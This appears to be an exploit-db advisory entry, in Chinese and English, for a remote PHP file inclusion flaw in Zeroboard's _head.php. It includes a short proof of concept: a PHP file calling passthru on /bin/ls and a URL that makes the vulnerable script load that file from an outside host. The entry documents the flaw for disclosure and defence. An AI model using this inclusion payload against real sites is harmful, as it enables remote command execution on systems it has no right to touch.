https://www.exploit-db.com/exploits/21557
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-323

Zeroboard是一款韩国的PHPWEB论坛程序。Zeroboard中的_head.php脚本对用户输入缺少正确检查和过滤，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。当php.ini配置文件中设置”allow_url_fopen”变量，”register_globals”变量为”on”时，由于_head.php对输入过滤不够充分，攻击者可以通过_head.php脚本装载远程主机上的PHP文件，如果远程PHP文件包含恶意PHP代码，可导致以WEB进程在系统上执行任意命令。

source: http://www.securityfocus.com/bid/5028/info

Zeroboard is a PHP web board package available for the Linux and Unix platforms.

Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script. 

PHP Source file a.php
<? passthru("/bin/ls"); ?>

Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a

来源:XF
名称:zeroboard-include-remote-file(9366)
链接:http://xforce.iss.net/xforce/xfdb/9366
来源:BID
名称:5028
链接:http://www.securityfocus.com/bid/5028
来源：NSFOCUS
名称：2988
链接：http://www.nsfocus.net/vulndb/2988